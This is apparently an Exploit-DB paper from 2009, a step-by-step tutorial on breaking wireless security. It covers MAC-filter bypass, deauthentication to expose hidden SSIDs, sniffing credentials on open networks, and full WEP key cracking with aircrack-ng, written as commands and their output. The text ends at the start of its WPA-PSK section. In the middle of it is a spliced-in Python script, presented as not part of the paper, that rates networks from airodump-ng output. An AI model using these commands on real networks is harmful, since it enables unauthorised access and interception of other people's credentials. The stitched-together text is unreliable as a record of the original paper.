Wi-Foo Ninjitsu Exploitation

EDB-ID: 12956
CVE: N/A
Platform: Multiple
Date: 2009-02-24


		|=--------------------------------------------------------------------=|
		|=----------------=[  Wi-Foo Ninjitsu Exploitation   ]=---------------=|
		|=-----------------------=[ 24 February 2009 ]=-----------------------=|
		|=---------------------=[  By CWH Underground  ]=---------------------=|
		|=--------------------------------------------------------------------=|
				

######
 Info
######

Title	: Wi-Foo Ninjitsu Exploitation
Author	: JabAv0C && ZeQ3uL
Team    : CWH Underground [www.milw0rm.com/author/1456]
Website	: cwh.citec.us / www.citec.us
Date	: 2009-02-24


##########
 Contents
##########

  [0x00] - Introduction

  [0x01] - Security of Wireless network

  [0x02] - Breaking the Simple Defenses
	
	[0x02a] - Mac Filtering
	[0x02b] - Discover Hidden SSID
	[0x02c] - Sniffing informations on the Air

  [0x03] - Get closer with cracking tool
	
	[0x03a] - Aircrack-ng suite
	[0x03b] - Decrypt packet with airdecap-ng
	[0x03c] - Decloak packet with airdecloak-ng 
	[0x03d] - AirCracking 101
	
  [0x04] - Owned the WEP Key with Simple Technique (No Injection)

	[0x04a] - Capturing method
	[0x04b] - Cracking method

  [0x05] - Owned the WEP Key with Advanced Technique (With Inject Method)

	[0x05a] - Monitor Mode
	[0x05b] - Fake Authentication
	[0x05c] - Arp Replay Attack
	[0x05d] - Fragmentation Attack
	[0x05e] - Korek ChopChop Attack
	[0x05f] - Packetforge
	[0x05g] - ARP Request Replay with Interactive Attack
	[0x05h] - Cracking WEP Key

  [0x06] - Conclusion steps for cracking WEP

  [0x07] - Owned the WPA-PSK/WPA2-PSK Key

  [0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)

  [0x09] - Exploiting CISCO LEAP

  [0x10] - Mass Exploit with Karmetasploit

  [0x11] - References

  [0x12] - Greetz To


#######################
 [0x00] - Introduction
#######################

	This paper introduces practical techniques used by hackers to break wireless security.
We recommend that the reader have basic knowledge of wireless operation.

	This paper contains 13 sections, but the practical content is in 10 sections, from 0x02 to 0x10.
Section 0x02 covers basic attacks on wireless networks. Section 0x03 describes the tools used
throughout this tutorial. Sections 0x04, 0x05 and 0x06 explain how to crack WEP. Sections 0x07, 0x08
and 0x09 detail cracking WPA and WPA2. Section 0x10 covers using Metasploit against wireless
clients through a rogue AP.


#######################################
 [0x01] - Security of Wireless Network
#######################################
	
	A wireless network has a serious drawback compared with a wired network: it uses the air as its medium, so an attacker
is able to mount man-in-the-middle and other attacks against it.

	Wireless security is therefore a major concern, and the security standards for wireless networks can be divided as follows:
	
	- WEP
	- WPA-PSK
	- WPA2-PSK
	- WPA-802.1x
	- WPA2-802.1x

	WEP is the original security standard for wireless networks, but it is easily cracked. WPA and WPA2 were introduced to increase
wireless security and fix the vulnerabilities in WEP. WPA and WPA2 are further divided into Pre-Shared Key and 802.1x modes, used for
personal and enterprise networks respectively. In addition to these standards, there are other mechanisms intended to enhance wireless
security, such as hidden SSIDs and MAC filtering. This tutorial covers breaking each of these standards and mechanisms and also presents
other attacks a hacker can carry out against a wireless network.


#######################################
 [0x02] - Breaking the Simple Defenses
#######################################

	++++++++++++++++++++++++++++++++
	 [0x02a] - Bypass Mac Filtering
	++++++++++++++++++++++++++++++++
		
		This basic security method stores the MAC addresses of legitimate clients in the access point. When an authentication request
	reaches the access point, it compares the requesting MAC address with the addresses stored in its memory. If they match,
	authentication succeeds; otherwise it fails. However, this method is easy to bypass: the attacker only has to change the MAC address with a few commands.

		We have a case study of bypassing MAC filtering. One day, we had the chance to do a wireless penetration test for a company.
	First, we used Kismet to discover the access points around the company, which told us the exact location of each access point. Then we ran airodump-ng
	locked to one channel to capture packets; fixing the target channel improves the efficiency of airodump-ng. From airodump-ng we learned that
	the access point used open authentication and no encryption. So we tried to connect to the access point, but it refused
	our authentication request. We concluded that this network used MAC filtering. From airodump-ng, we saw that there were clients associated with the access point.
	We immediately changed our MAC address to that of an associated client and tried to connect again. This time everything was fine and we were attached to the access point.
	Moreover, we were able to reach the company's internal network and run any tool, such as nmap, Nessus or an exploit, against the internal servers. This is very dangerous.


	++++++++++++++++++++++++++++++++
	 [0x02b] - Discover Hidden SSID
	++++++++++++++++++++++++++++++++

		In some environments, the wireless administrator configures the access point to hide the SSID, so an attacker cannot learn the SSID of the network
	and therefore cannot connect to it. In airodump-ng, such a network shows as <length ?>, where ? is the length of the SSID.
	The SSID can only be learned from an association request, which is sent when a legitimate client connects to the network.
	We are able to force a legitimate client to reconnect to the access point by sending it a de-authentication packet with aireplay-ng.
	The command for doing that is:

	#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
	21:56:47  Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
	21:56:47  Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]

		After the de-authentication packet is sent to the client, the client re-authenticates and re-associates.
	Airodump-ng detects this exchange and learns the SSID of the network.
	

	++++++++++++++++++++++++++++++++++++++++++++
	 [0x02c] - Sniffing informations on the Air
	++++++++++++++++++++++++++++++++++++++++++++
		
		This topic needs no advanced technique or deep knowledge. Many wireless networks use open authentication without any
	encryption. The attacker only has to sniff packets from the air and look for credentials in protocols such as HTTP,
	Telnet and FTP. These protocols have no encryption, so usernames and passwords can be found simply by reading the captured packets.
	We are able to sniff other people's data with airodump-ng.


###########################################
 [0x03] - Get closer with cracking tool
###########################################

	We recommend using Aircrack-ng. Aircrack-ng is an 802.11 WEP and WPA-PSK key cracking program that can recover keys once enough data packets
have been captured. It implements the standard FMS attack along with some optimizations like the KoreK attacks, as well as the all-new PTW attack,
thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks.


	+++++++++++++++++++++++++++++
	 [0x03a] - Aircrack-ng suite
	+++++++++++++++++++++++++++++

		There are four tools in the aircrack-ng suite which play an important role in this tutorial.

	- airodump-ng: used for capturing packets
		Use airodump-ng first every time in order to open monitor mode, which also enables the injection capability of our card, on the preferred channel
	- aireplay-ng: used for injection
		o de-authentication: sends de-authentication packets to an associated client
		o fake authentication: performs the fake authentication process
		o interactive packet replay: lets us choose the packet to use in a replay attack
		o arp replay: performs the ARP replay attack automatically
		o Korek chopchop: generates a key stream using the chopchop technique
		o fragment: generates a key stream using the fragmentation technique
	- packetforge-ng: used to create packets
	- aircrack-ng: used to recover the key

	More detail: http://aircrack-ng.org/doku.php#aircrack-ng_suite1


	+++++++++++++++++++++++++++++++++++++++++++
	 [0x03b] - Decrypt packet with airdecap-ng
	+++++++++++++++++++++++++++++++++++++++++++

		After we have the WEP or WPA key, we sometimes want to decrypt the captured packets. The Aircrack team has already
	provided a tool for this, called "airdecap-ng". Examples of using airdecap-ng look like:

	#airdecap-ng -b xx:xx:xx:xx:xx:xx workshop-01.cap

	or

	#airdecap-ng -e Workshop workshop-02.cap

	The output from these commands is a file whose name ends in "-dec.cap".

	PS. For WPA, airdecap-ng only returns a successful result for a file that contains the four-way handshake.


	+++++++++++++++++++++++++++++++++++++++++++++
	 [0x03c] - Decloak packet with airdecloak-ng 
	+++++++++++++++++++++++++++++++++++++++++++++

		Cloaking is a technique for disturbing the WEP key cracking process. It works by injecting packets encrypted with random WEP keys
	into the network; these packets are called "chaff". If the attacker captures these packets and feeds them to the cracker, the result will be wrong or no result
	will be returned. However, the Aircrack team developed a tool to deal with this technique, called "airdecloak-ng".

	#airdecloak-ng --bssid xx:xx:xx:xx:xx:xx -i workshop-01.cap

	This command returns two files:
	- workshop-01-filtered.cap: contains the filtered packets from the specified BSSID
	- workshop-01-cloaked.cap: contains the cloaked packets from the specified BSSID


	++++++++++++++++++++++++++++
	 [0x03d] - AirCracking 101 
	++++++++++++++++++++++++++++

		PTW Attack (-z)
			(aircrack-ng -z capture.cap). Only works for 64/128-bit WEP and requires ARP request/reply packets, so you must dump all packets with airodump-ng.

		Dictionary Attack (WPA/WPA2 passphrases)
			(aircrack-ng -w pass.lst *.cap)

		Fudge Attack (-f)
			Once you hit 2 million IVs, try the fudge factor with "-f 4". Retry, increasing the fudge factor by adding 4 to it each time.


	** All the while, keep collecting data. Remember the golden rule: "The More IVs the Better".


#################################################################	
 [0x04] - Owned the WEP Key with Simple Technique (No Injection)
#################################################################
		
		WEP is effectively a dead method for protecting a network from unauthorized access. There are several ways to crack a WEP key.
	First of all, we need a device which supports monitor mode and can inject packets into the network.

		After that we prepare the cracking tools; I chose aircrack-ng in BT3 final on VMware.

	OK, let us be clear about the concept of cracking WEP.
	The main idea is to collect as many encrypted packets as fast as we can and then use these packets to crack the WEP key.
	So, there are two situations arising from the above idea:

		1. The network has high traffic.
		2. The network has low traffic.

	What is the difference between them?
	In the first case, we only use airodump-ng to collect packets and then crack the key, but in the second case
	we have to inject packets in order to capture more packets. We first introduce the capturing and cracking method,
	and then the injection method, which is only needed on a low-traffic network.
		

	++++++++++++++++++++++++++++
	 [0x04a] - Capturing method
	++++++++++++++++++++++++++++
		
		First, we introduce the way to collect packets. For a 64-bit WEP key, we need about 50,000 IV packets, and
	about 150,000 IV packets for a 128-bit WEP key.

	The command for collecting packets is

	#airodump-ng -w workshop rausb0

	------------------------------------------------------------------------------------------
	 [ CH 11 ][ Elapsed: 16 mins ][ 2009-02-23 21:21 ][ Decloak: xx:xx:xx:xx:xx:xx

	 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

	 xx:xx:xx:xx:xx:xx   77  94    10905    11054    0  11  54. WEP  WEP    OPN  Workshop
	
	 BSSID              STATION            PWR   Rate  Lost  Packets  Probes
	
	 xx:xx:xx:xx:xx:xx  yy:yy:yy:yy:yy:yy   85  54-54     0     7747  
	------------------------------------------------------------------------------------------

	We get the file "workshop-01.cap", used for cracking the key later.

	We can judge the number of usable packets from the #Data field: around 90% of the packets counted in the data field are the IV packets we need.
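A defender reading the same airodump-ng table wants to know which networks are still in the tiers this paper breaks. The following Python is an added example, not part of this paper: it parses the AP table shown above (the "Workshop" row is the paper's own; the other rows are constructed) and rates each network using the tiers of [0x01] and the IV figures given in this section.

```python
"""Rate the networks in an airodump-ng AP table against the tiers of [0x01].
Added example, not part of the paper; all rows except 'Workshop' are constructed."""
import re

MAC_RE = re.compile(r"^[0-9A-Fa-fx]{2}(?::[0-9A-Fa-fx]{2}){5}$")   # 'xx:..' placeholders allowed
# ENC may be two tokens on mixed-mode APs ('WPA2 WPA'), CIPHER likewise ('CCMP TKIP');
# an OPN network prints no cipher and no auth, so the ESSID follows immediately.
# (An ESSID that itself starts with 'PSK' or 'CCMP' would be misread; rare, but known.)
SEC_RE = re.compile(
    r"^(?P<enc>(?:WPA\d?\s+)*WPA\d?|WEP|OPN)\s*"
    r"(?P<cipher>(?:(?:CCMP|GCMP|TKIP|WEP\d*|WRAP)\s+)*)"
    r"(?P<auth>PSK|MGT|OPN|SKA)?\s*(?P<essid>.*)$")
HIDDEN_RE = re.compile(r"^<length:\s*\d+>$")          # how airodump-ng prints a hidden SSID
# Figures from [0x04a]: ~50,000 IVs for a 64-bit key, ~150,000 for a 128-bit key,
# and about 90% of the #Data counter are usable IV packets.
IVS_NEEDED = {"64-bit": 50_000, "128-bit": 150_000}
IV_FRACTION = 0.9

SAMPLE = """\
 [ CH 11 ][ Elapsed: 16 mins ][ 2009-02-23 21:21 ][ Decloak: xx:xx:xx:xx:xx:xx

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 xx:xx:xx:xx:xx:xx   77  94    10905    11054    0  11  54. WEP  WEP    OPN  Workshop
 00:11:22:33:44:01   60  88     2310      450    0   6  54e WPA2 WPA CCMP TKIP PSK  Guest Net
 00:11:22:33:44:02   55  90     1880       12    0   1  54. WPA2 CCMP   MGT  <length:  8>
 00:11:22:33:44:03   48  70      900        0    0  11  54  OPN              Cafe-Free

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes

 xx:xx:xx:xx:xx:xx  yy:yy:yy:yy:yy:yy   85  54-54     0     7747
"""

def parse_ap_table(text):
    """Return one dict per AP row of the table whose header ends in ESSID.
    The columns before ENC are split on whitespace (RXQ is present only when
    airodump-ng is locked to a channel, so the count is taken from the header)."""
    lines = text.splitlines()
    hdr = next(i for i, l in enumerate(lines)
               if l.split()[:1] == ["BSSID"] and l.rstrip().endswith("ESSID"))
    keys = [k.rstrip(",") for k in lines[hdr].split()]     # '#Data,' -> '#Data'
    n_lead = len(keys) - 4                                 # everything before ENC
    rows = []
    for line in lines[hdr + 1:]:
        parts = line.split(None, n_lead)
        if parts and parts[0] == "BSSID":
            break                                          # station table starts here
        if len(parts) <= n_lead or not MAC_RE.match(parts[0]):
            continue
        m = SEC_RE.match(parts[n_lead].rstrip())
        if not m:
            continue
        row = dict(zip(keys[:n_lead], parts[:n_lead]))
        row.update(ENC=" ".join(m["enc"].split()), CIPHER=m["cipher"].split(),
                   AUTH=m["auth"], ESSID=m["essid"])
        rows.append(row)
    return rows

def rate(row):
    """Place a row in the tiers of [0x01] and say why it matters."""
    enc, auth = row["ENC"], row["AUTH"]
    if enc == "OPN":
        tier, why = "open", "no encryption; credentials are readable on the air ([0x02c])"
    elif enc == "WEP":
        tier = "WEP"
        ivs = int(row["#Data"]) * IV_FRACTION
        ready = [k for k, n in IVS_NEEDED.items() if ivs >= n]
        why = (f"~{ivs:,.0f} IVs already on the air, enough for a {ready[-1]} key ([0x04])"
               if ready else f"~{ivs:,.0f} IVs so far; injection makes any WEP key recoverable ([0x05])")
    elif auth == "PSK":
        tier, why = "PSK", f"{enc}: one captured handshake plus a dictionary ([0x07])"
    elif auth == "MGT":
        tier, why = "802.1X", f"{enc}: safe only if clients verify the RADIUS certificate ([0x08])"
    else:
        tier, why = "unknown", f"unrecognised ENC/AUTH {enc!r}/{auth!r}"
    if HIDDEN_RE.match(row["ESSID"]):
        why += "; hidden SSID, revealed by the next (re)association ([0x02b])"
    return {"essid": row["ESSID"], "tier": tier, "why": why}

if __name__ == "__main__":
    for r in parse_ap_table(SAMPLE):
        print(f"{r['BSSID']}  {rate(r)['tier']:7}  {r['ESSID']!r}: {rate(r)['why']}")
```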

	
	+++++++++++++++++++++++++++
	 [0x04b] - Cracking method
	+++++++++++++++++++++++++++
		
		After we have collected enough encrypted packets (IV packets), we use aircrack-ng to recover the key.

	#aircrack-ng -b xx:xx:xx:xx:xx:xx workshop-01.cap
	
	-b xx:xx:xx:xx:xx:xx is the MAC address of the target access point

	A successful cracking result looks like the following:
	---------------------------------------------------------------
	Opening workshop-01.cap
	Attack will be restarted every 5000 captured ivs.
	Starting PTW attack with 50417 ivs.
	                         KEY FOUND! [ 00:11:22:33:44 ]
	        Decrypted correctly: 100%
	---------------------------------------------------------------

#########################################################################	
 [0x05] - Owned the WEP Key with Advanced Technique (With Inject Method)
#########################################################################
 
	This method is not necessary on a high-traffic network, but it is very important on a low-traffic network. The idea behind it is that
we inject a packet to force the access point to generate a new packet back to the client. The new packet carries a new IV.

	Thinking carefully about the idea above: the source MAC address must be associated, the packet must be sent from a client to the access point,
and the packet must cause the access point to produce a response or another packet; normally we should choose a packet whose destination is the broadcast MAC address.

	We can summarise the requirements for the packet chosen for injection as follows.
	- The source MAC address is associated with the access point. (We can arrange this by fake authentication.)
	- It is sent from a client to the access point. (The "To DS" flag is set to 1.)
	- The destination MAC address is broadcast. (FF:FF:FF:FF:FF:FF)

	The well-known packet which meets all of these requirements is the broadcast ARP request. In the aircrack-ng suite, aireplay-ng has an option to
perform the ARP replay attack. The idea of this attack is to capture an ARP request and replay it to the access point in order to generate new IV packets.
But the network may have no broadcast ARP request at that time, so we can divide the injection technique into two scenarios:
	- The network has ARP requests.
	- The network has no ARP requests.

	Whichever case we face, the important thing to realize is that we have to perform the injection with an associated MAC address.
Now we have two choices: either change our MAC address to an already associated MAC address, or perform fake authentication.


	++++++++++++++++++++++++
	 [0x05a] - Monitor Mode
	++++++++++++++++++++++++	

		Use airmon-ng to set your Wi-Fi card to monitor mode and prepare it for packet injection.
	
	#airmon-ng start wlan0 11
		
		This sets wlan0 to monitor mode on channel 11. We must specify the same channel as the target AP's channel.

	+++++++++++++++++++++++++++++++
	 [0x05b] - Fake Authentication
	+++++++++++++++++++++++++++++++

		We can do fake authentication with the following command.

		#aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0

		-a xx:xx:xx:xx:xx:xx is the MAC address of the access point
		-h yy:yy:yy:yy:yy:yy is the MAC address of our wireless card

		If we get a successful result, our MAC address is associated with the target access point.

	A successful result looks like:
	------------------------------------------
	00:00:00  Sending Authentication Request
	00:00:00  Authentication successful
	00:00:00  Sending Association Request
	00:00:00  Association successful :-)
	------------------------------------------

	After succeeding in fake authentication, we have to determine what type of network we face and pick the appropriate steps to deal with it.


	+++++++++++++++++++++++++++++
	 [0x05c] - Arp Replay Attack
	+++++++++++++++++++++++++++++
	
		We can run the ARP replay attack with the following command.

		#aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0

		-b xx:xx:xx:xx:xx:xx is the MAC address of the access point
		-h yy:yy:yy:yy:yy:yy is the MAC address of our wireless card

		Aireplay-ng will detect an ARP request and use it to perform the replay attack automatically.

	The response looks like the following once it finds an ARP request.
	------------------------------------------------------------------------------------
	21:06:20  Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
	Saving ARP requests in replay_arp-0223-210620.cap
	You should also start airodump-ng to capture replies.
	Read 1379 packets (got 30 ARP requests and 0 ACKs), sent 3468 packets...(499 pps)
	------------------------------------------------------------------------------------
	
		** In some cases, no ARP request is broadcast on the network, so we cannot use the normal ARP replay attack.
	We then have to recover a key stream from a captured packet, use that key stream to forge an ARP request packet, and replay it to the access point
	in order to generate new IV packets. There are two ways to recover a key stream, called the "chopchop attack" and the "fragmentation attack".
	Both can be performed with aireplay-ng.


	++++++++++++++++++++++++++++++++
	 [0x05d] - Fragmentation Attack
	++++++++++++++++++++++++++++++++

		The fragmentation attack is used to recover a key stream of 1500 bytes, so we can use this key stream to create a packet
	of up to 1500 bytes. The command for the fragmentation attack is

		#aireplay-ng -5 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0

	The system responds with this:
	-------------------------------------------------------------------------------
	21:21:07  Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
	21:21:07  Waiting for a data packet...


		Size: 90, FromDS: 1, ToDS: 0 (WEP)
	
	              BSSID  =  00:1B:2F:3D:CB:D6
	          Dest. MAC  =  00:1A:73:37:E2:A3
	         Source MAC  =  00:1B:2F:3D:CB:D6
	
	        0x0000:  8842 2c00 001a 7337 e2a3 001b 2f3d cbd6  .B,...s7..../=..
	        0x0010:  001b 2f3d cbd6 20df 0000 b168 ff00 2872  ../=.. ....h..(r
	        0x0020:  7547 d03f 70d7 2d29 1397 7d3d ac16 382a  uG.?p.-)..}=..8*
	        0x0030:  f20f 77fb ca63 13e0 f7a6 9228 ddc0 8263  ..w..c.....(...c
	        0x0040:  5315 a328 87cb 0d4a b36a e5be 93c7 307a  S..(...J.j....0z
	        0x0050:  7bc2 18d7 2df5 94f2 5aed                 {...-...Z.
	
	Use this packet ? 
	-------------------------------------------------------------------------------
	
	We have to answer "y"
	
	-----------------------
	Use this packet ? y
	-----------------------
	
	And the successful process looks like this:
	----------------------------------------------------------------------------------
	Saving chosen packet in replay_src-0223-212107.cap
	Data packet found!
	Sending fragmented packet
	Got RELAYED packet!!
	Thats our ARP packet!
	Trying to get 384 bytes of a keystream
	Got RELAYED packet!!
	Thats our ARP packet!
	Trying to get 1500 bytes of a keystream
	Got RELAYED packet!!
	Thats our ARP packet!
	Saving keystream in fragment-0223-212107.xor
	Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
	----------------------------------------------------------------------------------


	+++++++++++++++++++++++++++++++++
	 [0x05e] - Korek ChopChop Attack
	+++++++++++++++++++++++++++++++++

		KoreK developed a tricky attack method called chopchop. It needs only one encrypted packet, which is decrypted
	to recover the key stream; the key stream is then used to build an ARP request packet, and finally the ARP replay attack is performed.
	We are able to run the chopchop attack with this command.

		#aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0

		Aireplay-ng will pick a packet to decrypt; we can choose any packet whose BSSID is that of our target.
	
	The response from the command looks like this:
	--------------------------------------------------------------------------------------
	21:12:42  Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11


		Size: 90, FromDS: 1, ToDS: 0 (WEP)

	              BSSID  =  00:1B:2F:3D:CB:D6
	          Dest. MAC  =  00:1A:73:37:E2:A3
	         Source MAC  =  00:1B:2F:3D:CB:D6
	
	        0x0000:  8842 2c00 001a 7337 e2a3 001b 2f3d cbd6  .B,...s7..../=..
	        0x0010:  001b 2f3d cbd6 6084 0000 55bc e600 2e4e  ../=..`...U....N
	        0x0020:  a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0  .4...L..,..H.'..
	        0x0030:  767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0  v}'%..b.%..K....
	        0x0040:  bb3f 4874 c821 c402 467d f70f 2a56 43a7  .?Ht.!..F}..*VC.
	        0x0050:  b09b f0f1 8b04 fc1c 0b72                 .........r
	
	Use this packet ? 
	----------------------------------------------------------------------------------------
	
	And we will answer by typing "y" like this
	
	---------------------
	Use this packet ? y
	---------------------
	
	And then the system does the decryption:
	
	---------------------------------------------------------------------------------------
	Saving chosen packet in replay_src-0223-211242.cap
	
	Offset   87 ( 3% done) | xor = 4E | pt = 3C |   64 frames written in  1097ms
	Offset   86 ( 5% done) | xor = 16 | pt = 1D |  119 frames written in  2029ms
	Offset   85 ( 7% done) | xor = 63 | pt = 7F |  146 frames written in  2476ms
	Offset   84 ( 8% done) | xor = 97 | pt = 6B |  239 frames written in  4068ms
	Offset   83 (10% done) | xor = 0E | pt = 0A |  228 frames written in  3865ms
	Offset   82 (12% done) | xor = 86 | pt = 0D |  273 frames written in  4646ms
	Offset   81 (14% done) | xor = C9 | pt = 38 |    2 frames written in    35ms
	Offset   80 (16% done) | xor = C4 | pt = 34 |  185 frames written in  3145ms
	Offset   79 (17% done) | xor = BB | pt = 20 |  250 frames written in  4253ms
	Offset   78 (19% done) | xor = F7 | pt = 47 |   97 frames written in  1649ms
	Offset   77 (21% done) | xor = E9 | pt = 4E |  247 frames written in  4196ms
	Offset   76 (23% done) | xor = 12 | pt = 51 |  237 frames written in  4029ms
	Offset   75 (25% done) | xor = 56 | pt = 00 |   52 frames written in   884ms
	Offset   74 (26% done) | xor = 2A | pt = 00 |  431 frames written in  7326ms
	Offset   73 (28% done) | xor = 7E | pt = 71 |  232 frames written in  3946ms
	Offset   72 (30% done) | xor = 1C | pt = EB |  123 frames written in  2093ms
	Offset   71 (32% done) | xor = B6 | pt = CB |    9 frames written in   141ms
	Offset   70 (33% done) | xor = BC | pt = FA |  256 frames written in  4365ms
	Offset   69 (35% done) | xor = 1A | pt = 18 |  179 frames written in  3041ms
	Offset   68 (37% done) | xor = 94 | pt = 50 |  118 frames written in  2002ms
	Offset   67 (39% done) | xor = 50 | pt = 71 |   65 frames written in  1109ms
	Offset   66 (41% done) | xor = 9D | pt = 55 |  172 frames written in  2921ms
	Offset   65 (42% done) | xor = 3C | pt = 48 |  196 frames written in  3338ms
	Offset   64 (44% done) | xor = BE | pt = F6 |  281 frames written in  4763ms
	Offset   63 (46% done) | xor = 81 | pt = BE |   61 frames written in  1051ms
	Offset   62 (48% done) | xor = AC | pt = 17 |  456 frames written in  7748ms
	Offset   61 (50% done) | xor = D2 | pt = 72 |   73 frames written in  1231ms
	Offset   60 (51% done) | xor = 9C | pt = 34 |  428 frames written in  7288ms
	Offset   59 (53% done) | xor = 64 | pt = B7 |  120 frames written in  2036ms
	Offset   58 (55% done) | xor = 87 | pt = 55 |  188 frames written in  3200ms
	Offset   57 (57% done) | xor = 0C | pt = 47 |  119 frames written in  2024ms
	Offset   56 (58% done) | xor = 8C | pt = 07 |  124 frames written in  2095ms
	Offset   55 (60% done) | xor = 2C | pt = 02 |  364 frames written in  6197ms
	Offset   54 (62% done) | xor = 25 | pt = 00 |  136 frames written in  2315ms
	Offset   53 (64% done) | xor = 44 | pt = A8 |  142 frames written in  2410ms
	Offset   52 (66% done) | xor = A2 | pt = C0 |  102 frames written in  1733ms
	Offset   51 (67% done) | xor = C9 | pt = 14 |   19 frames written in   329ms
	Offset   50 (69% done) | xor = D5 | pt = 6B |  183 frames written in  3110ms
	Offset   49 (71% done) | xor = 0B | pt = 2E |   62 frames written in  1048ms
	Offset   48 (73% done) | xor = E8 | pt = CF |   18 frames written in   306ms
	Offset   47 (75% done) | xor = FB | pt = 86 |   29 frames written in   496ms
	Offset   46 (76% done) | xor = 4B | pt = 3D |  100 frames written in  1702ms
	Offset   45 (78% done) | xor = D6 | pt = 06 |   77 frames written in  1312ms
	Offset   44 (80% done) | xor = FD | pt = 6D |  226 frames written in  3828ms
	Offset   43 (82% done) | xor = 27 | pt = 00 |  117 frames written in  2001ms
	Offset   42 (83% done) | xor = 4F | pt = 40 |   38 frames written in   641ms
	Offset   41 (85% done) | xor = 1C | pt = 54 |  354 frames written in  6020ms
	Offset   40 (87% done) | xor = 20 | pt = D5 |  277 frames written in  4714ms
	Offset   39 (89% done) | xor = C4 | pt = 30 |  113 frames written in  1918ms
	Offset   38 (91% done) | xor = 2C | pt = 00 |  485 frames written in  8244ms
	Offset   37 (92% done) | xor = 8A | pt = 00 |  231 frames written in  3933ms
	
	
	The AP appears to drop packets shorter than 37 bytes.
	Enabling standard workaround:  IP header re-creation.
	This doesn't look like an IP packet, try another one.
	
	Warning: ICV checksum verification FAILED! Trying workaround.
		
	The AP appears to drop packets shorter than 40 bytes.
	Enabling standard workaround:  IP header re-creation.
		
	Saving plaintext in replay_dec-0223-211410.cap
	Saving keystream in replay_dec-0223-211410.xor
	
	Completed in 21s (2.48 bytes/s)
	---------------------------------------------------------------------------------------

	The result of this process is a .xor file and a .cap file: the .xor file contains the key stream and the .cap file contains the decrypted packet.

	
	+++++++++++++++++++++++
	 [0x05f] - Packetforge
	+++++++++++++++++++++++

		Create an encrypted packet from the PRGA (the XOR file) obtained by chopchop or fragmentation.

		#packetforge-ng -0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0223-211410.xor -w arp

	The result is:
	----------------------
	Wrote packet to: arp
	----------------------
	
	From this command, we get an ARP request packet in the file named "arp".


	++++++++++++++++++++++++++++++++++++++++++++++++++++++
	 [0x05g] - ARP Request Replay with Interactive Attack
	++++++++++++++++++++++++++++++++++++++++++++++++++++++

		We use aireplay-ng to inject the ARP request packet to the access point with the following command.

		#aireplay-ng -2 -r arp rausb0

	The response will look like:
	-----------------------------------------------------------------------------------
		Size: 68, FromDS: 0, ToDS: 1 (WEP)
	
	              BSSID  =  00:1B:2F:3D:CB:D6
	          Dest. MAC  =  FF:FF:FF:FF:FF:FF
	         Source MAC  =  00:21:27:C0:07:71
	
	        0x0000:  0841 0201 001b 2f3d cbd6 0021 27c0 0771  .A..../=...!'..q
	        0x0010:  ffff ffff ffff 8001 55bc e600 2e4e a334  ........U....N.4
	        0x0020:  a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b  ...J..$.&.O&..l;
	        0x0030:  ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e  .z*6].%,...dc-S~
	        0x0040:  66bf 700e                                f.p.
	
	Use this packet ?   
	-----------------------------------------------------------------------------------
	
	We have to answer "y"
	
	---------------------
	Use this packet ? y
	---------------------
	
	aireplay-ng starts injecting the packet.
	
	-------------------------------------------------------
	Saving chosen packet in replay_src-0223-211755.cap
	You should also start airodump-ng to capture replies.
	
	Sent 1200 packets...(499 pps)
	-------------------------------------------------------
	

	++++++++++++++++++++++++++++
	 [0x05h] - Cracking WEP Key
	++++++++++++++++++++++++++++

		After we have collected enough encrypted packets (IV packets), we use aircrack-ng to recover the key.

		#aircrack-ng -z capture1.cap (PTW Attack)

	A successful cracking result looks like the following:
	---------------------------------------------------------------
	Opening capture1.cap
	Attack will be restarted every 5000 captured ivs.
	Starting PTW attack with 50417 ivs.
	                         KEY FOUND! [ 00:11:22:33:44 ]
	        Decrypted correctly: 100%
	---------------------------------------------------------------


##############################################
 [0x06] - Conclusion Scripts for Cracking WEP
##############################################
	
	Note: $AP is the access point MAC address
	      $WIFI is the Wi-Fi card MAC address

	- airmon-ng start wlan0 11 (the channel for monitor mode must be specified)
	- airodump-ng -c 11 -w capture1.cap wlan0
	- aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0
	- aireplay-ng -4 -b $AP -h $WIFI wlan0
		If it does not work, try #aireplay-ng -5 -b $AP -h $WIFI wlan0
	- packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.0 -l 255.255.255.0 -y replay_dec-03.xor -w arp-request
	- aireplay-ng -2 -r arp-request wlan0
	- aircrack-ng -z capture1.cap

	** This method can also be used to crack WEP on a network with no clients (clientless).


#########################################
 [0x07] - Owned the WPA-PSK/WPA2-PSK Key
#########################################

	PSK stands for Pre-Shared Key. These mechanisms were improved to solve the WEP vulnerabilities,
so the key cannot be cracked by the same means as WEP. The only way to recover a WPA-PSK or WPA2-PSK key is to capture
the four-way handshake and crack it with a dictionary attack.

	The idea for cracking a pre-shared key is to gather the four-way handshake packets. We can do this by de-authenticating an associated client.
This forces the client to re-authenticate, and we capture the four-way handshake from that process. The command for de-authentication is:

